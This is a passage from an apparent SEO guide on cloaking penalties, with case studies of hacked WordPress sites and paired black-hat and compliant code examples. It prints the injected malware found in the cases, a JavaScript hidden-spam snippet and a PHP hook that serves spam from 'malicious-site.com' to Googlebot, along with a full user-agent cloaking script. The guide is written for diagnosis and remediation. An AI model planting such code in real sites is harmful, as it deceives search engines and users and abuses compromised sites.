- Week 28: Traffic at 85% of pre-penalty levels (October 15, 2024)
Revenue Loss:
6 months at reduced traffic: $1.29M in lost revenue
Key Lessons:
- Mobile optimization ≠ permission to serve different content
- Test URL Inspection Tool on representative sample before going live
- Recovery takes 2-3x longer than removal of violation
- Not all rankings return—some competitors captured lost ground
Case Study 2: News Publisher Algorithmic Penalty (4-Week Recovery)
Background:
Regional news publisher. 200K monthly visits. Revenue from ads and subscriptions.
The Violation:
Their WordPress site had a compromised plugin that injected JavaScript-based cloaking:
// Injected malicious code
if (/googlebot|bingbot/i.test(navigator.userAgent)) {
// Inject keyword-stuffed content for bots
const spam = document.createElement('div');
spam.style.display = 'none';
spam.innerHTML = 'insurance health medical pharmacy [50+ spam keywords]';
document.body.appendChild(spam);
}
Detection Timeline:
- Day 1: Plugin compromise (date unknown, likely weeks earlier)
- Day 14: Traffic drop begins (gradual, not manual action)
- Day 21: 54% traffic drop noticed, investigation starts
- Day 22: Malicious code discovered via curl testing
The Penalty:
No manual action—purely algorithmic. Google's rendering system detected hidden content that appeared only for bots.
Traffic Impact:
| Week | Organic Visits | Change |
|---|---|---|
| Week 1-2 (normal) | 52,000 | — |
| Week 3 (drop starts) | 38,000 | -27% |
| Week 4 (full penalty) | 24,000 | -54% |
| Week 6 (post-fix) | 28,000 | -46% |
| Week 8 (recovered) | 49,000 | -6% |
Recovery Process:
Step 1: Identify Compromise (Day 22)
Using curl method described earlier:
curl -A "Googlebot/2.1" https://newssite.com/article | grep -i "insurance\|pharmacy"
# Output: Found 47 spam keywords
Step 2: Clean Malware (Days 22-24)
- Removed compromised plugin
- Scanned all files with Wordfence
- Restored clean versions from backup (verified spam-free)
- Changed all admin passwords
Step 3: Verify Clean (Day 25)
- Re-tested with curl (no spam found)
- Used Google URL Inspection Tool (verified clean rendering)
- Checked Google Cache (still showing spam version from weeks earlier)
Step 4: Security Hardening (Days 26-28)
Implemented WordPress security hardening:
- Updated all plugins
- Removed unused plugins
- Installed Wordfence with proper configuration
- Enabled two-factor authentication
Step 5: Request Fresh Crawl (Day 28)
- Submitted URL for re-indexing in Search Console
- Generated new XML sitemap, submitted to Search Console
Recovery Timeline:
- Day 28: Clean version confirmed
- Day 35: Google recrawled, cached clean version
- Week 6: Traffic recovering (up to 28,000 visits)
- Week 8: Nearly full recovery (49,000 visits, 94% of pre-penalty)
Revenue Impact:
4 weeks at 50% traffic: $34K in lost ad revenue
Why Recovery Was Faster:
- No manual action—algorithmic penalties lift faster
- Clean removal (no residual issues)
- Proactive security prevented reinfection
- News site with strong historical authority recovered rankings quickly
Key Lessons:
- Compromised sites account for 30%+ of cloaking cases I see
- Regular security audits catch issues before Google does
- Algorithmic penalties (no manual action) can recover in 4-6 weeks
- Always verify clean with multiple methods before assuming fix worked
Case Study 3: Hacked WordPress Site Deindexation (8-Week Recovery)
Background:
Small business services directory (plumbers, electricians, etc.). 80K monthly visits. Local business advertising revenue.
The Violation:
Site hacked via outdated WordPress core (version 5.8, vulnerability patched in 5.9). Hackers injected PHP code that served pharmaceutical spam to search engines:
// Injected in functions.php
add_action('template_redirect', 'serve_spam_to_bots');
function serve_spam_to_bots() {
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
header('HTTP/1.1 200 OK');
echo file_get_contents('http://malicious-site.com/spam-page.html');
exit;
}
}
Googlebot saw pharmaceutical spam. Users saw normal directory listings.
Detection Timeline:
- Week 1: Site compromised (September 1, 2024)
- Week 3: Google indexes spam pages (September 15)
- Week 5: Complete deindexation (September 29)
- Week 5: Site owner notices zero traffic, contacts me
The Penalty:
Complete removal from Google index. Manual action: "Hacked with spam content." Search Console showed 470 spam URLs indexed.
Traffic Impact:
| Period | Organic Visits | Ad Revenue |
|---|---|---|
| Pre-hack (August) | 81,200 | $9,400 |
| During deindexation (Oct) | 140 | $20 |
| Recovery start (Nov) | 8,500 | $980 |
| Full recovery (Dec) | 76,000 | $8,800 |
Recovery Process:
Step 1: Emergency Malware Removal (Week 5, Days 1-2)
# Find recently modified files
find /var/www/html -type f -mtime -30 -ls
# Found modified files:
# - wp-content/themes/theme-name/functions.php
# - wp-config.php
# - .htaccess
# - wp-content/uploads/suspicious.php
Removed all malicious code, restored clean backups of modified files.
Step 2: Identify Entry Point (Week 5, Day 3)
- WordPress 5.8 (critical vulnerabilities)
- Admin password: "admin123" (dictionary attack entry point)
- No security plugins installed
- File permissions: 777 on wp-content (wrong)
Step 3: Security Hardening (Week 5, Days 3-5)
- Updated WordPress to 6.4.1 (latest stable)
- Changed all passwords (20+ character random)
- Installed and configured Wordfence
- Fixed file permissions (644 for files, 755 for directories)
- Removed all unused plugins and themes
- Enabled two-factor authentication
Step 4: Clean URL Removal (Week 5-6)
- Identified 470 spam URLs in Search Console
- Used Google's "URL Removal Tool" to request removal
- Added 301 redirects from spam URLs to 410 Gone status (signal they're permanently removed)
# .htaccess - Signal spam URLs are gone
RedirectMatch 410 /viagra.*
RedirectMatch 410 /cialis.*
RedirectMatch 410 /pharmacy.*
Step 5: Reconsideration Request (Week 6)
"Our WordPress site was compromised via outdated core version and weak admin credentials. Malicious code served pharmaceutical spam to Googlebot while showing users normal content. We have: 1) Removed all malicious code (verified with Wordfence full scan), 2) Updated WordPress to 6.4.1 and all plugins, 3) Implemented strong passwords and 2FA, 4) Configured Wordfence with firewall rules, 5) Fixed file permissions, 6) Requested removal of 470 spam URLs. We've verified clean content via URL Inspection Tool [list of 20 sample URLs]. Ongoing monitoring with Wordfence and weekly manual audits."
Step 6: Fresh Content Signal (Week 6-7)
- Published 5 new, high-quality directory listings
- Submitted updated XML sitemap
- Used "Request Indexing" in Search Console for clean pages
Reconsideration Timeline:
- Week 6: First request submitted (October 22, 2024)
- Week 8: Manual action removed (November 5, 2024)
- Week 10: Partial traffic recovery (8,500 visits)
- Week 14: Near-full recovery (76,000 visits, 94% of pre-hack)
Revenue Loss:
8 weeks near-zero traffic + 6 weeks partial recovery: $47K in lost ad revenue
Why Recovery Took Longer:
- Complete deindexation (not just penalty) requires full re-crawl
- Trust signal damaged—Google was cautious about re-indexing
- Spam URLs lingered in cache for weeks after removal
- Had to prove ongoing security measures, not just one-time fix
Key Lessons:
- Outdated WordPress is the #1 hack vector I see (70% of compromised sites)
- Weekly security scans catch hacks before Google deindexes
- Complete deindexation recovery takes 2-3x longer than penalties
- Document everything for reconsideration request (tools used, steps taken)
- Ongoing monitoring requirement—mention it in reconsideration
Common Mistakes During Recovery:
- Removing malware but not fixing entry point (reinfection within weeks)
- Submitting reconsideration before verifying 100% clean
- Not documenting security measures taken
- Expecting instant recovery (Google recrawls gradually)
Code Examples: Black Hat vs. White Hat Implementations
The difference between a penalty and compliant implementation often comes down to a few lines of code. I've extracted these examples from real sites—the "wrong way" from penalized sites I've audited, the "right way" from compliant implementations.
Example 1: The Wrong Way (User Agent Detection)
This PHP code from a penalized e-commerce site (April 2024) shows textbook black-hat cloaking:
<?php
// ❌ BLACK HAT: User-agent based content switching
function detect_googlebot() {
$user_agent = $_SERVER['HTTP_USER_AGENT'];
return (strpos($user_agent, 'Googlebot') !== false ||
strpos($user_agent, 'Bingbot') !== false);
}
if (detect_googlebot()) {
// Serve keyword-stuffed content to bots
?>
<h1>Best Running Shoes Buy Running Shoes Online Running Shoe Store</h1>
<div class="seo-content">
Running shoes for men women kids. Best running shoes 2024.
Buy running shoes online. Running shoe reviews. Top running shoes.
[... 500+ more keywords ...]
</div>
<?php
} else {
// Serve clean content to users
?>
<h1>Premium Running Shoes</h1>
<div class="product-grid">
[... normal product display ...]
</div>
<?php
}
?>
Why This Is Cloaking:
- Detects user-agent and serves different content
- Keyword density for bots is 5x higher than for users
- Deceptive intent: manipulating what search engines think the page is about
The Penalty:
Manual action within 6 weeks. 82% traffic drop.
Example 2: The Right Way (Responsive Design)
Here's the compliant alternative—same business goal (mobile optimization), no cloaking:
<?php
// ✅ WHITE HAT: Same HTML for all user-agents
?>
<!DOCTYPE html>
<html>
<head>
<title>Premium Running Shoes - Free Shipping</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
/* Responsive design with CSS */
.product-description-full {
display: block;
}
@media (max-width: 768px) {
.product-description-full {
max-height: 200px;
overflow: hidden;
position: relative;
}
.product-description-full::after {
content: '';
position: absolute;
bottom: 0;
left: 0;
right: 0;
height: 50px;
background: linear-gradient(transparent, white);
}
}
</style>
</head>
<body>
<h1>Premium Running Shoes</h1>
<div class="product-description-full">
<!-- Same content for all devices - progressively enhanced -->
<p>Our premium running shoes combine advanced cushioning technology
with lightweight design for optimal performance.</p>
<h2>Technical Specifications</h2>
<ul>
<li>Weight: 8.2oz (men's size 9)</li>
<li>Drop: 8mm heel-to-toe</li>
<li>Cushioning: Dual-density foam</li>
</ul>
<!-- Full content here - CSS handles display -->
</div>
<button onclick="expandDescription()">Read More</button>
<script>
// Progressive enhancement - works for all users
function expandDescription() {
document.querySelector('.product-description-full').style.maxHeight = 'none';
}
</script>
</body>
</html>
Why This Is Compliant:
- Identical HTML served to all user-agents (bots and humans)
- CSS handles responsive layout (not server-side detection)
- Progressive enhancement improves UX without hiding content from crawlers
- No deceptive intent—everyone sees the same data
Example 3: Proper Internationalization with Hreflang
Here's the correct way to serve different content by location (from a client implementation in May 2024):
<!DOCTYPE html>
<html lang="en-us">
<head>
<title>Running Shoes - United States</title>
<!-- hreflang tags signal alternate versions -->
<link rel="alternate" hreflang="en-us"
href="https://example.com/en-us/running-shoes" />
<link rel="alternate" hreflang="en-gb"
href="https://example.com/en-gb/running-shoes" />
<link rel="alternate" hreflang="de-de"
href="https://example.com/de-de/laufschuhe" />
<link rel="alternate" hreflang="x-default"
href="https://example.com/running-shoes" />
</head>
<body>
<!-- US version content here -->
<h1>Running Shoes - Free Shipping in USA</h1>
<p>Prices in USD. Ships from California warehouse.</p>
</body>
</html>
Server-Side Geo-Detection (Nginx):
# Nginx configuration
geo $user_country {
default US;
# Using CloudFlare's CF-IPCountry header
# Or GeoIP2 module
}
server {
listen 80;
server_name example.com;
location /running-shoes {
# Redirect based on geo-location
if ($user_country = GB) {
return 302 /en-gb/running-shoes;
}
if ($user_country = DE) {
return 302 /de-de/laufschuhe;
}
# Default to US version
try_files $uri $uri/ =404;
}
# Critical: Signal content varies by location
add_header Vary "Accept-Language, CF-IPCountry";
}
Why This Is Compliant:
- hreflang tags signal alternate versions to search engines
- Each region gets consistent content (German users always see German, including Googlebot crawling from Germany)
- No user-agent detection—only IP-based geographic routing
Varyheader signals legitimate variation- Googlebot can discover and crawl all regional versions
What Would Make It Cloaking:
- Serving full product catalog to Googlebot but hiding certain products from EU users (without proper structured data signaling)
- Detecting user-agents instead of using geographic IP routing
- Different product prices for bots vs. users in the same region
Example 4: Legitimate Geo-Targeting Implementation
This is how you properly implement IP-based content delivery without triggering cloaking penalties (from a client in the financial services industry):
<?php
// ✅ Correct: Geographic content restriction with transparency
// Detect user country via IP (using GeoIP2 library)
require_once 'vendor/autoload.php';
use GeoIp2\Database\Reader;
$reader = new Reader('/path/to/GeoLite2-Country.mmdb');
$user_ip = $_SERVER['REMOTE_ADDR'];
try {
$record = $reader->country($user_ip);
$country_code = $record->country->isoCode;
} catch (Exception $e) {
$country_code = 'US'; // Default
}
// Content restrictions based on regulation compliance
$restricted_countries = ['CU', 'IR', 'KP', 'SY']; // OFAC restrictions
if (in_array($country_code, $restricted_countries)) {
// Serve restricted message to ALL visitors from these countries
// (Including Googlebot when it crawls from these locations)
http_response_code(451); // Unavailable For Legal Reasons
header('Vary: CF-IPCountry'); // Signal geographic variation
?>
<!DOCTYPE html>
<html>
<head>
<title>Service Unavailable - Legal Restrictions</title>
</head>
<body>
<h1>Service Unavailable in Your Region</h1>
<p>Due to regulatory restrictions, our services are not
available in your country.</p>
<p>Country detected: <?php echo $country_code; ?></p>
</body>
</html>
<?php
exit;
}
// For allowed countries, serve normal content
// (Same for users and bots from allowed locations)
header('Vary: CF-IPCountry');
?>
<!DOCTYPE html>
<html>
<head>
<title>Financial Services Platform</title>
</head>
<body>
<h1>Welcome to Our Platform</h1>
<!-- Full content here -->
</body>
</html>
Why This Is Compliant:
- Geo-restrictions based on IP (legal requirement, not SEO manipulation)
- Same content served to all user-agents in each geographic region
- Proper HTTP status code (451) signals legal restriction
Varyheader signals content differs by location- Transparent about why content is restricted
Key Implementation Details:
- Use 451 status code (not 403 or 404) for legal restrictions
- Include
Vary: CF-IPCountryor similar header - Show restriction message to everyone (bots and users) from restricted regions
- Document legal basis in robots.txt or site policy
**What Woul